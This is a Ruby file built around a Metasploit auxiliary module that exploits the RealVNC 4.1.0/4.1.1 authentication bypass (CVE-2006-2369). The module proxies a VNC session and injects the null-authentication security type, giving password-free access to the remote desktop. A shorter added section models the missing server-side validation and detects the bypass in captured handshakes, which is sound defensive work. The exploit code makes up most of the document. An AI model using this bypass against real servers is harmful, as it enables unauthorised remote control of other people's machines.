```ruby
##
# $Id: realvnc_41_bypass.rb 13641 2011-08-26 04:40:21Z bannedit $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'RealVNC Authentication Bypass',
      'Description' => %q{
        This module exploits an Authentication Bypass Vulnerability
        in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy
        listener on LPORT and proxies to the target server. The AUTOVNC
        option requires that vncviewer be installed on the attacking
        machine. This option should be disabled for Pro
      },
      'Author'      =>
        [
          'hdm', # original msf2 module
          'TheLightCosine <thelightcosine[at]gmail.com>'
        ],
      'License'     => MSF_LICENSE,
      'Version'     => '$Revision: 13641 $',
      'References'  =>
        [
          ['BID', '17978'],
          ['OSVDB', '25479'],
          ['URL', 'http://secunia.com/advisories/20107/'],
          ['CVE', 'CVE-2006-2369'],
        ],
      'DisclosureDate' => 'May 15 2006'))

    register_options(
      [
        OptAddress.new('RHOST', [true, 'The Target Host']),
        OptPort.new('RPORT',    [true, "The port the target VNC Server is listening on", 5900]),
        OptPort.new('LPORT',    [true, "The port the local VNC Proxy should listen on", 5900]),
        OptBool.new('AUTOVNC',  [true, "Automatically Launch vncviewer from this host", true])
      ], self.class)
  end

  def run
    # Starts up the listener server
    print_status("starting listener")
    listener = Rex::Socket::TcpServer.create(
      'LocalHost' => '0.0.0.0',
      'LocalPort' => datastore['LPORT'],
      'Context'   =>
        {
          'Msf'        => framework,
          'MsfExploit' => self
        }
    )

    # If the AUTOVNC option is set to true this will spawn a vncviewer on the local machine
    # targeting the proxy listener.
    if (datastore['AUTOVNC'])
      unless (check_vncviewer())
        print_error("vncviewer does not appear to be installed, exiting!!!")
        return nil
      end
      print_status("Spawning viewer thread")
      view = framework.threads.spawn("VncViewerWrapper", false) {
        system("vncviewer 127.0.0.1::#{datastore['LPORT']}")
      }
    end

    # Establishes the connection between the viewer and the remote server
    client = listener.accept
    add_socket(client)
    s = Rex::Socket::Tcp.create(
      'PeerHost' => datastore['RHOST'],
      'PeerPort' => datastore['RPORT'],
      'Timeout'  => 1
    )
    add_socket(s)

    serverhello = s.gets
    unless serverhello.include? "RFB 003.008"
      print_error("The VNCServer is not vulnerable")
      return
    end

    # MitM attack on the VNC Authentication Process
    client.puts(serverhello)
    clienthello = client.gets
    s.puts(clienthello)
    authmethods = s.recv(2)
    print_status("Auth Methods Received. Sending Null Authentication Option to Client")
    client.write("\x01\x01")
    client.recv(1)
    s.write("\x01")
    s.recv(4)
    client.write("\x00\x00\x00\x00")

    # Handles remaining proxy operations between the two sockets
    closed = false
    while(closed == false)
      sockets = []
      sockets << client
      sockets << s
      selected = select(sockets, nil, nil, 0)
      #print_status("Selected: #{selected.inspect}")
      unless selected.nil?
        if selected[0].include?(client)
          #print_status("Transfering from client to server")
          begin
            data = client.sysread(8192)
            if data.nil?
              print_error("Client Closed Connection")
              closed = true
            else
              s.write(data)
            end
          rescue
            print_error("Client Closed Connection")
            closed = true
          end
        end
        if selected[0].include?(s)
          #print_status("Transfering from server to client")
          begin
            data = s.sysread(8192)
            if data.nil?
              print_error("Server Closed Connection")
              closed = true
            else
              client.write(data)
            end
          rescue
            closed = true
          end
        end
      end
    end

    # Garbage collection
    s.close
    client.close
    print_status("Listener Closed")
    if (datastore['AUTOVNC'])
      view.kill
      print_status("Viewer Closed")
    end
  end

  def check_vncviewer
    vnc = Rex::FileUtils::find_full_path('vncviewer') ||
      Rex::FileUtils::find_full_path('vncviewer.exe')
    if (vnc)
      return true
    else
      return false
    end
  end

end
```
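The bypass above works because the affected server accepts a client-selected security type it never offered. The following is an added example, not part of the Metasploit module, modelling the server-side check that closes that gap and a detection over a captured handshake; the two-byte server message and the one-byte client reply are constructed samples in RFB 3.8 layout.

```ruby
# Added example (not part of the Metasploit module above).
# RFB 3.8 security handshake layout: the server sends [count][type...],
# the client answers with a single type byte. Type numbers from the RFB
# specification: 1 = None, 2 = VNC Authentication.
SECURITY_NONE    = 1
SECURITY_VNCAUTH = 2

# Parses the server's security-type list message (e.g. "\x01\x02" means
# "one type offered: VNC Authentication"). Returns the offered types as an
# array of integers; raises on an empty or truncated message.
def parse_security_types(msg)
  count = msg.getbyte(0)
  raise ArgumentError, "empty security-type list" if count.nil? || count.zero?
  types = msg.byteslice(1, count)
  raise ArgumentError, "truncated security-type list" if types.nil? || types.bytesize != count
  types.bytes
end

# The check RealVNC 4.1.0/4.1.1 was missing: a client may only select a type
# the server actually offered. Returns [:accept, reason] or [:reject, reason].
def validate_client_choice(offered, chosen)
  return [:reject, "type #{chosen} was not offered"] unless offered.include?(chosen)
  [:accept, "type #{chosen}"]
end

# Detection over a captured handshake (e.g. from a packet capture): true when
# the client picked a type outside the server's list, which is the pattern
# the proxy above produces (None selected against a server offering only
# VNC Authentication).
def handshake_suspicious?(server_msg, client_byte)
  offered = parse_security_types(server_msg)
  chosen  = client_byte.getbyte(0)
  validate_client_choice(offered, chosen).first == :reject
end

if __FILE__ == $0
  # Constructed samples: server offers only VNC Authentication (type 2)
  puts handshake_suspicious?("\x01\x02".b, "\x01".b)  # true: bypass pattern
  puts handshake_suspicious?("\x01\x02".b, "\x02".b)  # false: legitimate choice
end
```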